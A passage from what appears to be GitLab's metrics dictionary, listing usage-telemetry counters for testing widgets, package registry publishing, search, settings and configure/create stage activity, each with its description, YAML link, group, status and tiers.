definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216182158_i_testing_metrics_report_artifact_uploaders_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_metrics_report_widget_total_monthly` + +Count of unique users per month who expanded the metrics report MR widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182139_i_testing_metrics_report_widget_total_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_metrics_report_widget_total_weekly` + +Count of unique users per week who expanded the metrics report MR widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216182138_i_testing_metrics_report_widget_total_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_summary_widget_total_monthly` + +Unique users that expand the test summary merge request widget by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210413205507_i_testing_summary_widget_total_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_summary_widget_total_weekly` + +Unique users that expand the test summary merge request widget by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210413205507_i_testing_summary_widget_total_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_test_case_parsed_monthly` + +Internal Tracking to count number of unit tests parsed for planning of future code testing features. Data available [here](https://app.periscopedata.com/app/gitlab/788674/Verify:Testing-Group-Metrics?widget=10454394&udv=0) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182136_i_testing_test_case_parsed_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_test_case_parsed_weekly` + +Internal Tracking to count number of unit tests parsed for planning of future code testing features. Data available [here](https://app.periscopedata.com/app/gitlab/788674/Verify:Testing-Group-Metrics?widget=10454394&udv=0) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216182134_i_testing_test_case_parsed_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_web_performance_widget_total_monthly` + +Count of unique users per month who expanded the browser performance report MR widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182151_i_testing_web_performance_widget_total_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_web_performance_widget_total_weekly` + +Count of unique users per week who expanded the browser performance report MR widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216182149_i_testing_web_performance_widget_total_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.testing_total_unique_counts_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184140_testing_total_unique_counts_monthly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free` + +### `redis_hll_counters.testing.testing_total_unique_counts_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184138_testing_total_unique_counts_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.users_expanding_testing_accessibility_report_monthly` + +Count of expanding the accessibility report widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210409100628_users_expanding_testing_accessibility_report_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.testing.users_expanding_testing_accessibility_report_weekly` + +Count of expanding the accessibility report widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210409100628_users_expanding_testing_accessibility_report_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.testing.users_expanding_testing_code_quality_report_monthly` + +Count of expanding the code quality widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210409100451_users_expanding_testing_code_quality_report_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.testing.users_expanding_testing_code_quality_report_weekly` + +Count of expanding the code quality widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210409100451_users_expanding_testing_code_quality_report_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_composer_user_monthly` + +A monthly count of users that have published a Composer package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184854_i_package_composer_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_composer_user_weekly` + +A weekly count of users that have published a Composer package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184852_i_package_composer_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_conan_user_monthly` + +A monthly count of users that have published a Conan package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184858_i_package_conan_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_conan_user_weekly` + +A weekly count of users that have published a Conan package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184856_i_package_conan_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_container_user_monthly` + +A monthly count of users that have published a container image to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184902_i_package_container_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_container_user_weekly` + +A weekly count of users that have published a container image to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184900_i_package_container_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_debian_user_monthly` + +A monthly count of users that have published a Debian package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184906_i_package_debian_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_debian_user_weekly` + +A weekly count of users that have published a Debian package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184904_i_package_debian_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_generic_user_monthly` + +A monthly count of users that have published a generic package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184910_i_package_generic_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `broken` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_generic_user_weekly` + +A weekly count of users that have published a generic package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184908_i_package_generic_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `broken` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_golang_user_monthly` + +A monthly count of users that have published a Go moduleto the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184913_i_package_golang_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_golang_user_weekly` + +A weekly count of users that have published a Go module to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184911_i_package_golang_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_helm_user_monthly` + +Distinct user count events for Helm packages in recent 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210517075259_i_package_helm_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_helm_user_weekly` + +Distinct user count events for Helm packages in recent 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210517075252_i_package_helm_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_maven_user_monthly` + +A monthly count of users that have published a Maven package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184917_i_package_maven_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_maven_user_weekly` + +A weekly count of users that have published a Maven package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184916_i_package_maven_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_npm_user_monthly` + +A monthly count of users that have published an npm package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184921_i_package_npm_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_npm_user_weekly` + +A weekly count of users that have published an npm package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184919_i_package_npm_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_nuget_user_monthly` + +A monthly count of users that have published a NuGet package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184925_i_package_nuget_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_nuget_user_weekly` + +A weekly count of users that have published a NuGet package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184923_i_package_nuget_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_pypi_user_monthly` + +A monthly count of users that have published a PyPI package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184929_i_package_pypi_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_pypi_user_weekly` + +A weekly count of users that have published a Python package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184927_i_package_pypi_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_rubygems_user_monthly` + +Distinct user count of RubyGems packages published in recent 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210303154654_i_package_rubygems_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_rubygems_user_weekly` + +A weekly count of distinct RubyGems packages published by a user + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210303154652_i_package_rubygems_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_tag_user_monthly` + +A monthly count of users that have published a package tag to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184933_i_package_tag_user_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_tag_user_weekly` + +A weekly count of users that have published a package with a tag to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184931_i_package_tag_user_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_terraform_module_user_monthly` + +Number of distinct users creating Terraform Module packages in recent 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210410012208_i_package_terraform_module_user_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.i_package_terraform_module_user_weekly` + +Number of distinct users creating Terraform Module packages in recent 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210410012209_i_package_terraform_module_user_weekly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.user_packages_total_unique_counts_monthly` + +A monthly count of users that have published a package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184937_user_packages_total_unique_counts_monthly.yml) + +Group: `group::package` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.user_packages.user_packages_total_unique_counts_weekly` + +A weekly count of users that have published a package to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184935_user_packages_total_unique_counts_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `reply_by_email_enabled` + +Whether incoming email is setup + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124916_reply_by_email_enabled.yml) + +Group: `group::certify` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `search_unique_visits.i_search_advanced` + +Calculated unique users to perform Advanced searches by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180418_i_search_advanced.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `search_unique_visits.i_search_paid` + +Calculated unique users to perform a search with a paid license enabled by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180420_i_search_paid.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `search_unique_visits.i_search_total` + +Calculated unique users to perform Basic or Advanced searches by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180416_i_search_total.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `search_unique_visits.search_unique_visits_for_any_target_monthly` + +Total unique users for i_search_total, i_search_advanced, i_search_paid for recent 28 days. This metric is redundant because advanced will be a subset of paid and paid will be a subset of total. i_search_total is more appropriate if you just want the total + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183922_search_unique_visits_for_any_target_monthly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `search_unique_visits.search_unique_visits_for_any_target_weekly` + +Total unique users for i_search_total, i_search_advanced, i_search_paid for recent 7 days. This metric is redundant because advanced will be a subset of paid and paid will be a subset of total. i_search_total is more appropriate if you just want the total + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183920_search_unique_visits_for_any_target_weekly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `settings.gitaly_apdex` + +Gitaly application performance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210321224827_gitaly_apdex.yml) + +Group: `group::gitaly` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `settings.ldap_encrypted_secrets_enabled` + +Is encrypted LDAP secrets configured? + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216175606_ldap_encrypted_secrets_enabled.yml) + +Group: `group::distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `settings.operating_system` + +Information about the operating system running GitLab + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210225045628_operating_system.yml) + +Group: `group::distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `signup_enabled` + +Whether public signup is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124918_signup_enabled.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `topology` + +Topology data + +[Object JSON schema](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/objects_schemas/topology_schema.json) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210323120839_topology.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_applications_cert_managers` + +Total GitLab Managed clusters with GitLab Managed App:Cert Manager installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175329_clusters_applications_cert_managers.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_applications_helm` + +Total GitLab Managed clusters with GitLab Managed App:Helm enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175331_clusters_applications_helm.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_applications_ingress` + +Total GitLab Managed clusters with GitLab Managed App:Ingress installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175333_clusters_applications_ingress.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_applications_knative` + +Total GitLab Managed clusters with GitLab Managed App:Knative installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175335_clusters_applications_knative.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_disabled` + +Total GitLab Managed disabled clusters + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175339_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_enabled` + +Total GitLab Managed clusters currently enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175341_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_management_project` + +Total GitLab Managed clusters with defined cluster management project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175337_clusters_management_project.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_platforms_eks` + +Total GitLab Managed clusters provisioned with GitLab on AWS EKS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175345_clusters_platforms_eks.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_platforms_gke` + +Total GitLab Managed clusters provisioned with GitLab on GCE GKE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175343_clusters_platforms_gke.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.clusters_platforms_user` + +Total GitLab Managed clusters that are user provisioned + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175346_clusters_platforms_user.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.group_clusters_disabled` + +Total GitLab Managed disabled clusters attached to groups + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175352_group_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.group_clusters_enabled` + +Total GitLab Managed enabled clusters attached to groups + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175354_group_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.instance_clusters_disabled` + +Total GitLab Managed disabled clusters attached to the instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175348_instance_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.instance_clusters_enabled` + +Total GitLab Managed enabled clusters attached to the instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175350_instance_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.project_clusters_disabled` + +Total GitLab Managed disabled clusters attached to projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175356_project_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.project_clusters_enabled` + +Total GitLab Managed enabled clusters attached to projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175358_project_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.configure.projects_slack_notifications_active` + +Unique projects with Slack webhook enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175400_projects_slack_notifications_active.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `usage_activity_by_stage.configure.projects_slack_slash_active` + +Unique projects with Slack ‘/’ commands enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175402_projects_slack_slash_active.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `usage_activity_by_stage.configure.projects_with_prometheus_alerts` + +Projects with Prometheus alerting enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175403_projects_with_prometheus_alerts.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.approval_project_rules` + +Total number of project approval rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182030_approval_project_rules.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.approval_project_rules_with_exact_required_approvers` + +Number of approval rules with the exact number of required approvers. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183355_approval_project_rules_with_exact_required_approvers.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.approval_project_rules_with_less_approvers_than_required` + +Number of approval rules with fewer approvers than required. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183354_approval_project_rules_with_less_approvers_than_required.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.approval_project_rules_with_more_approvers_than_required` + +Number of approval rules with more approvers than required. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183352_approval_project_rules_with_more_approvers_than_required.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.approval_project_rules_with_target_branch` + +Number of project approval rules scoped to a specific repo branch. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182032_approval_project_rules_with_target_branch.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.deploy_keys` + +Count of users creating deploy keys. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182010_deploy_keys.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.keys` + +Count of users creating regular keys. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182012_keys.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.merge_requests` + +Count of the number of users creating merge requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175045_merge_requests.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.create.merge_requests_with_added_rules` + +Merge requests with added rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175047_merge_requests_with_added_rules.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.create.merge_requests_with_optional_codeowners` + +Count of merge requests with optional codeowner approval rules + +[YAML 